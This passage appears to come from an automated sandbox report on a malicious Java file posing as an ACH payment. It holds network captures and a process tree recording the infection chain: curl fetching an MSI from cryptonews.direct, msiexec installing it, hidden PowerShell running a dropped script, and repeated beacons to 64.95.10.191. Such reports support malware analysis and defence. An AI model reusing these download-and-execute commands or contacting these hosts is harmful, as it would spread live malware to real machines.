      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:50 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      23192.168.2.94973664.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:57.135027885 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:57.297852993 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:57 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      24192.168.2.94973764.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:03.776964903 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:03.939913988 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:03 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      25192.168.2.94973864.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:11.027213097 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:11.202244043 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:11 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      26192.168.2.94973964.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:17.671016932 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:17.811058998 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:17 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      27192.168.2.94974064.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:24.355781078 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:24.508038044 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:24 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      28192.168.2.94974264.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:38.152786970 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:38.308403969 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:38 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      29192.168.2.94974364.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:45.179122925 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:45.332254887 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:45 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      30192.168.2.94974464.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:51.812701941 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:51.979729891 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:51 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination Port
      31192.168.2.94974564.95.10.19180
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:49:58.855811119 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:49:59.009349108 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:49:58 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      HTTPS Proxied Packets

      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.949708172.67.168.2314437008C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-04-23 15:45:55 UTC132OUTGET /wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi HTTP/1.1
      Host: cryptonews.direct
      User-Agent: curl/7.83.1
      Accept: */*
      2024-04-23 15:45:56 UTC666INHTTP/1.1 200 OK
      Date: Tue, 23 Apr 2024 15:45:56 GMT
      Content-Type: application/octet-stream
      Content-Length: 32768
      Connection: close
      last-modified: Tue, 23 Apr 2024 13:42:21 GMT
      etag: "6627babd-8000"
      accept-ranges: bytes
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TljP7th4jqCDhrRJDjRH%2FJxopZqnb5keB5i5I%2F12A4onUbjWtHDGyO3PEQZ6fjIq9tJkz%2BEpgWEVcUsjX7ymDwFDH8U3qsi4ogUtXBVyFwKkxcGW71Ap9EEtIcOvekP1iiVvjw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 878efbc4afbb17ef-ATL
      alt-svc: h3=":443"; ma=86400
      2024-04-23 15:45:56 UTC703INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Data Ascii: >
      2024-04-23 15:45:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      2024-04-23 15:45:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      2024-04-23 15:45:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii:
      2024-04-23 15:45:56 UTC1369INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Data Ascii:
      2024-04-23 15:45:56 UTC1369INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Data Ascii:
      2024-04-23 15:45:56 UTC644INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Data Ascii:
      2024-04-23 15:45:56 UTC1369INData Raw: 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 05 00 ff ff ff ff ff ff ff ff 03 00 00 00 84 10 0c 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 80 df 01 82 64 95 da 01 03 00 00 00 00 17 00 00 00 00 00 00 16 3f cd 47 1c 42 37 46 b3 47 26 41 25 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 62 01 00 00 00 00 00
      Data Ascii: Root EntryFd?GB7FG&A%Hb
      2024-04-23 15:45:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 00 00 18 00 00 00 00 00 00 00 40 48 0f 42 e4 45 78 45 28 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 01 10 00 00 00 13 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 00 00 00 10 00 00 00 00 00 00 00 40 48 0f 42 e4 45 78 45 28 3b 32 44 b3 44 31 42 f1 45 36 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 02 01 05 00 00 00 0f 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00
      Data Ascii: 6@HBExE(H7@HBExE(;2DD1BE6H
      2024-04-23 15:45:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 01 16 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 00 00 00 24 00 00 00 00 00 00 00 40 48 3f 3b f2 43 38 44 b1 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 00 00 00 a0 02 00 00 00 00 00 00 40 48 3f 3f 77 45 6c 44 6a 3e b2 44 2f 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: B$@H?;C8DEC@H??wElDj>D/H


      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:17:45:53
      Start date:23/04/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"" >> C:\cmdlinestart.log 2>&1
      Imagebase:0xc50000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:1
      Start time:17:45:53
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:2
      Start time:17:45:53
      Start date:23/04/2024
      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
      Wow64 process (32bit):true
      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"
      Imagebase:0x1a0000
      File size:257'664 bytes
      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      General

      Target ID:6
      Start time:17:45:54
      Start date:23/04/2024
      Path:C:\Windows\SysWOW64\icacls.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
      Imagebase:0x5d0000
      File size:29'696 bytes
      MD5 hash:2E49585E4E08565F52090B144062F97E
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:7
      Start time:17:45:54
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:8
      Start time:17:45:54
      Start date:23/04/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
      Imagebase:0xc50000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:9
      Start time:17:45:54
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:11
      Start time:17:45:54
      Start date:23/04/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      General

      Target ID:16
      Start time:17:46:09
      Start date:23/04/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c C:\downloads\aHPCrYM1.msi
      Imagebase:0xc50000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:17
      Start time:17:46:09
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:18
      Start time:17:46:10
      Start date:23/04/2024
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi"
      Imagebase:0x670000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:19
      Start time:17:46:10
      Start date:23/04/2024
      Path:C:\Windows\System32\msiexec.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\msiexec.exe /V
      Imagebase:0x7ff6c0240000
      File size:69'632 bytes
      MD5 hash:E5DA170027542E25EDE42FC54C929077
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      General

      Target ID:20
      Start time:17:46:11
      Start date:23/04/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
      Imagebase:0x7ff7f78b0000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:21
      Start time:17:46:11
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:22
      Start time:17:46:11
      Start date:23/04/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
      Imagebase:0x7ff760310000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      General

      Target ID:23
      Start time:17:46:11
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      General

      Target ID:25
      Start time:17:46:13
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:26
      Start time:17:46:14
      Start date:23/04/2024
      Path:C:\Windows\System32\dllhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
      Imagebase:0x7ff733cd0000
      File size:21'312 bytes
      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:28
      Start time:17:46:16
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:29
      Start time:17:46:20
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:30
      Start time:17:46:23
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
